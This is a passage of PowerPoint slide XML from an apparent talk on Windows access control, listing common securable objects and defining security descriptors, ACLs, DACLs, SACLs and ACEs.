        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>No</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79ECB6EB-49EF-4E79-A9F9-27310E2714E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252644888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2EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="1400689"/>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ACL’s  DACL’s  SACL’s and  ACE’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SO’s and SD’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E43722-E393-43A1-A020-5DE43047A1F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266580" y="2240872"/>
            <a:ext cx="11560362" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Anonymous pipes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Processes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Threads</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ File-mapping objects</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Access tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Registry keys</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Network shares</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Window-management objects (windows stations and desktops)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Distributed Component Object Model (DCOM) objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A4E6B0-178F-4816-A9E8-C5FBB56FA296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5654012" y="2074203"/>
            <a:ext cx="6537988" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Files or folders on an NTFS file system</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Active Directory objects</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Local or remote printers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Windows services</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Named pipes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>‒ Job objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB41150-F2E2-4B2A-BECC-8E692CE3AE0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76944" y="1428274"/>
            <a:ext cx="6131296" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Common Securable Objects:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E815E80F-3633-47B2-ABEA-49C26CBCB3A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266580" y="6519446"/>
            <a:ext cx="12115056" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>SD = security descriptor, SO = Securable Object.               Every Securable Object has at least one Security Descriptor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350152873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2EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="1400689"/>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ACL’s  DACL’s  SACL’s and  ACE’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SO’s and SD’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266580" y="6519446"/>
            <a:ext cx="12115056" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>SD = security descriptor, SO = Securable Object.               Every Securable Object has at least one Security Descriptor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E43722-E393-43A1-A020-5DE43047A1F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266580" y="2240872"/>
            <a:ext cx="11560362" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Anonymous pipes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Processes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Threads</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ File-mapping objects</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Access tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Registry keys</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Network shares</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Window-management objects (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows stations and desktops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Distributed Component Object Model (DCOM) objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A4E6B0-178F-4816-A9E8-C5FBB56FA296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5654012" y="2074203"/>
            <a:ext cx="6537988" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Files or folders on an NTFS file system</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Active Directory objects</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Local or remote printers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Windows services</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Named pipes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>‒ Job objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB41150-F2E2-4B2A-BECC-8E692CE3AE0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76944" y="1428274"/>
            <a:ext cx="6131296" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Common Securable Objects:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197092747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2EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="1286304"/>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ACL’s  DACL’s  SACL’s and  ACE’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lots of Acronyms, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>soz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="117628" y="1197620"/>
            <a:ext cx="11956742" cy="4462760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ACL = Access Control List                               ---   Ordered list of ACEs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DACL = Discretionary Access Control List     ---  Identify the users and groups’ access permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SACL = System Access Control List                ---  What types of access are logged in Sec Event Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ACE = access control entry                            --- An actual entry in an ACL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A SD can contain two ACLs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- A DACL that identifies the users and groups that are </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>allowed or denied access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- A SACL that controls when/what/how access is audited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FEF14D-B67C-4E3A-BC83-CE3BA9C2A6C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6795414" y="2816707"/>
            <a:ext cx="5183225" cy="3911665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345082868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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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DACL’s  + ACE’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{397B7D7C-415F-4B47-8970-63165216714C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471040" y="778495"/>
            <a:ext cx="9327321" cy="6079505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54767666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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
